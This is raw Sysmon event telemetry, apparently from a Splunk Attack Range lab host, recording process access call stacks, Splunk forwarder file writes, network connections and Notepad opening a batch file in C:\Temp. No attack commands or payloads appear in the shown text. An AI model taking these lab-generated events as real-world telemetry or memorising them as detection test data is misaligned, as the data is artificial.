12:03:29.244{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.244{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:29.244{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.244{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:29.244{266CAFBE-64C5-6064-A500-00000000AE01}43565668C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+17d35c|C:\Windows\System32\SHELL32.dll+1981d8|C:\Windows\System32\SHELL32.dll+2845d3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+17d600 154100x80000000000000008791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.241{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\notepad.exe10.0.14393.4169 (rs1_release.210107-1130)NotepadMicrosoft® Windows® Operating SystemMicrosoft CorporationNOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Temp\1.batC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=BA78FCF8CA9D806C6C047357E31748DE,SHA256=34A07759492E31AEC2A009505FE8DFB50242375C4308AD4657B2872F4F75A077,IMPHASH=968239BE2020F1C0DAFFDCDBD49E9C82{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x80000000000000008815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:30.726{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEF07B80DDE8227E7DC89954B2CF0E2D,SHA256=94A3495329618830A9AF224F31EB99AF99BB35291230F98C99CF72C794381B8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:31.740{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1914FFF177AE35BFFC6CE5089B455711,SHA256=C11C5E7902A8515FF2C07145BCE269F69D85181BEEBEE1E66B557A69D6338B1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:32.753{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4857CF2F07F4457CCD079535F8BBACB,SHA256=696BB406AE0805F8F4667AE08566803A41C4CB6707DE2C10B24695AC6FFE2DBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:33.845{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7FF14485EED48E32D4F4685A58996AE,SHA256=53B5CF05B5D3DC56B75AB1538CE3F852F6062F6997725A09F07C12819CB7CD6F,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000008818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:32.401{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53611-false10.0.1.12-8000- 23542300x80000000000000008820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:34.859{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43107776B1D1E76CD26DA92E3D9AD5CC,SHA256=D02C8DAB325629F927862C82330304706FB543FD51DE9795C1E7902027F31FD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:35.873{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6498D856605206E00C0BCB5ADD092FA3,SHA256=826DF10270C595FFFE289C804628BD0FDC1FC72B33D5B1EAF38F69EAB5312065,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:35.592{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E64AD58F55D39B246417CEFB23A66B33,SHA256=93E537EAEF9D6AB66956DF0A64AD291AFE89845109974A6F8B5CD4DB3D9566F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:35.576{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E64AD58F55D39B246417CEFB23A66B33,SHA256=93E537EAEF9D6AB66956DF0A64AD291AFE89845109974A6F8B5CD4DB3D9566F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:35.576{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=1BDF97F8EF4B0966D9DF5063B4AA1BCA,SHA256=A07BB51C7E2C7CB3EE8F99CFDD9BF80EADFF8637FB492938B8DA5A64835C00CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:35.498{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64F7-6064-0801-00000000AE01}4280C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24cea|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:35.498{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64F7-6064-0801-00000000AE01}4280C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000008823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:33.668{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-892.attackrange.local53612-false52.177.166.224-443https 11241100x80000000000000008822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:35.280{266CAFBE-64F7-6064-0801-00000000AE01}4280C:\Windows\system32\sppsvc.exeC:\Windows\System32\spp\store\2.0\cache\cache.dat2016-09-12 11:33:54.437 23542300x80000000000000008821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:35.280{266CAFBE-64F7-6064-0801-00000000AE01}4280NT AUTHORITY\NETWORK SERVICEC:\Windows\system32\sppsvc.exeC:\Windows\System32\spp\store\2.0\cache\cache.datMD5=CFCAD513773CCB497FFBD0DC704C62E3,SHA256=A2A3911604B875A57CB966303E1E153E5B5CAB73F4F5905402F6E97AB2DB1C7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:36.902{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E147F1D3151330F746C7E484EA406355,SHA256=DA2BFCDA958588EB103C445EE5CBBDD5CC061D6CD471ED8B3F582EE72F274537,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:36.606{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=43583B3017127EA0A86180E48CF3BF74,SHA256=63056B139FAF00BF53BFB7FB059B085F12D1A63D2414E8F57B19615578098933,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:36.606{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=669ED54AC27B953D71B1CF4ED044C3A8,SHA256=5C5767BD82C1747EEFE0DF0F5B6CB23E34F2C086F381461DF0DBD4492F89199F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:37.994{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\DeviceMetadataCache\OLDCACHE.000MD5=9122C454A375CA024465FF3ABE4787B4,SHA256=C2346D518E0E6BAAC4D14FD68318E8E544E5EF5C6F79ABC5579D43EC6A8C9B7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:37.916{266CAFBE-64FC-6064-1001-00000000AE01}6660NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A3E7EDB0D3334B468EEDAD071A3237A,SHA256=2400FFA49229B5EA852B6C08CB2A15512EE20BEEDF8F48DB79901B0B193918D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:38.946{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38C381E9F6CD9FA20B4EF04EEDB65B38,SHA256=293545D5A0CCBE62A75782D730FAC70EA51DBFF0CC1E372616918811C299713E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:38.354{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53613-false10.0.1.12-8000- 23542300x80000000000000008836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:39.008{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=43583B3017127EA0A86180E48CF3BF74,SHA256=63056B139FAF00BF53BFB7FB059B085F12D1A63D2414E8F57B19615578098933,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:40.006{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6B384A2CEEB4A3CA76DCB508DFADC29,SHA256=E72C4297F6CAA17592FFA12ADEF432DF6A65736221D469104ECC4B33F9FF87BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:41.051{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECC8116EA2CBE6E04494236CA620E9E2,SHA256=61F381223D41A4365DFE8108223BB76E6FED523A8700C0A3C831DD3A7F99ED65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:42.112{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C40A2BE2DB3BBD0D4A250748F43C50F,SHA256=3671EF14EC5129357B8EB7301E503C627AC4B85B3D41663D7E5E66884D19EB38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:43.719{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6BA04DBC9D9FAAEDCC92251CEED5F99,SHA256=A2413F9A8E1E74371C6FFDD4F8A4A35CB153F7A07115F31FFB18C5DA4406421E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:43.719{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48041AEA27714D43586BB9537D96C063,SHA256=545556BBC851E2FC1B8AD626B8EF9C378F945E1A0CBB0CD2435A21551C1C2709,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:43.126{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8864A5195AFF07D0BBA470DC44882E1,SHA256=91F4BEE62C3C441B682E54E7684F2E06CD794C540D036C1033BC8018A0970EBF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:43.495{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53614-false10.0.1.12-8000- 11241100x80000000000000008846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:44.546{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat2021-03-31 12:01:44.767 23542300x80000000000000008845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:44.546{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=2250E80E51A43A05899F84A6FBED87EC,SHA256=ADBEFBCC563919FBDD705CA9B884BC382DB3B09D9BD6781151B262E24DD3CC61,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000008844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:44.140{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38DDA9A5A8397F0CAE7856796842EB0A,SHA256=1B9A2FF095EBD7EDA078982AF9B24697D68915DE4E381C41397BFAB6E1DD1C43,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.949{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1B01-00000000AE01}7144C:\Windows\System32\InstallAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.934{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6521-6064-1B01-00000000AE01}7144C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.934{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.934{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
